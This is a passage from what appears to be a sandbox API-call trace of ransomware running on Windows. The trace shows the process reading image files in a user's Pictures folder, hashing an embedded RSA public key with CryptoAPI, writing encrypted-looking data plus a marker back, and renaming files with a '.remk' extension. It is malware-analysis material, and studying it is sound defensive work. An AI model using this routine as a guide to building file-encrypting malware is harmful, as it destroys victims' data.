lpNumberOfBytesWritten=0x3adfb14*=0x12b88, lpOverlapped=0x0) returned 1 [0236.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf820 | out: hHeap=0x630000) returned 1 [0236.296] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x12b8d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.296] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0236.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0236.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0236.296] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0236.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0236.296] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0236.297] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.297] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.297] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.297] CloseHandle (hObject=0x640) returned 1 [0236.302] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x31891a0 [0236.302] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x37bd408 [0236.303] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31891a0 | out: hHeap=0x630000) returned 1 [0236.303] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\b1oXySBs7FK.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\2kwa8l\\b1oxysbs7fk.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\b1oXySBs7FK.jpg.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\2kwa8l\\b1oxysbs7fk.jpg.remk")) returned 1 [0236.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0236.304] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.304] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0236.305] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76781810, ftCreationTime.dwHighDateTime=0x1d5e121, ftLastAccessTime.dwLowDateTime=0x68aafa00, ftLastAccessTime.dwHighDateTime=0x1d5d7ac, ftLastWriteTime.dwLowDateTime=0x68aafa00, ftLastWriteTime.dwHighDateTime=0x1d5d7ac, nFileSizeHigh=0x0, nFileSizeLow=0xc996, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NfB4BN1dcg.bmp", cAlternateFileName="NFB4BN~1.BMP")) returned 1 [0236.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185d80 [0236.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x106) returned 0x31f6b30 [0236.306] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185d80 | out: hHeap=0x630000) returned 1 [0236.306] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\NfB4BN1dcg.bmp") returned=".bmp" [0236.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\NfB4BN1dcg.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\2kwa8l\\nfb4bn1dcg.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.306] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=51606) returned 1 [0236.306] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.309] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xc970, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.309] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.312] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.312] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xc996, lpOverlapped=0x0) returned 1 [0236.316] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.316] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.316] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.316] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.318] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.318] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.318] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.318] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.318] GetLastError () returned 0x0 [0236.318] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.318] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.318] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.318] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.318] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.318] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.318] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc9a0) returned 0x37cf820 [0236.319] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.319] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37ce9a0 [0236.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc690 [0236.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37ce9e8 [0236.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6a8 [0236.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6d8 [0236.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc738 [0236.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6f0 [0236.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0236.320] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.320] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6d8 | out: hHeap=0x630000) returned 1 [0236.320] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6f0 | out: hHeap=0x630000) returned 1 [0236.320] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc738 | out: hHeap=0x630000) returned 1 [0236.320] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.320] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc738 [0236.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0236.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc6f0 [0236.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0236.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc6d8 [0236.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6c48 [0236.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0236.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.321] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.321] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6f0 | out: hHeap=0x630000) returned 1 [0236.321] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.321] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6d8 | out: hHeap=0x630000) returned 1 [0236.321] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.321] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.321] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc738 | out: hHeap=0x630000) returned 1 [0236.321] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.321] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0236.321] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.321] GetCurrentThreadId () returned 0x314 [0236.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c5760 [0236.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0236.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0236.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.322] GetCurrentThreadId () returned 0x314 [0236.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0236.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0236.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc738 [0236.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0236.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0236.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0236.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0236.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0236.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6d8 [0236.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0236.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0236.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0236.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0236.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6f0 [0236.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0236.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0236.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6c0 [0236.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0236.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc750 [0236.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0236.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0236.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc720 [0236.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc708 [0236.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc768 [0236.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc708 | out: hHeap=0x630000) returned 1 [0236.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc708 [0236.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc720 | out: hHeap=0x630000) returned 1 [0236.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0236.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0236.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0236.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6d8 | out: hHeap=0x630000) returned 1 [0236.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6d8 [0236.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0236.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc738 | out: hHeap=0x630000) returned 1 [0236.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0236.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc768 | out: hHeap=0x630000) returned 1 [0236.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0236.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0236.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0236.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0236.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6d8 | out: hHeap=0x630000) returned 1 [0236.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0236.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0236.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0236.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0236.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0236.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0236.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0236.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0236.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0236.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0236.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc708 | out: hHeap=0x630000) returned 1 [0236.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0236.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc750 | out: hHeap=0x630000) returned 1 [0236.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6f0 | out: hHeap=0x630000) returned 1 [0236.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6c0 | out: hHeap=0x630000) returned 1 [0236.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0236.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: 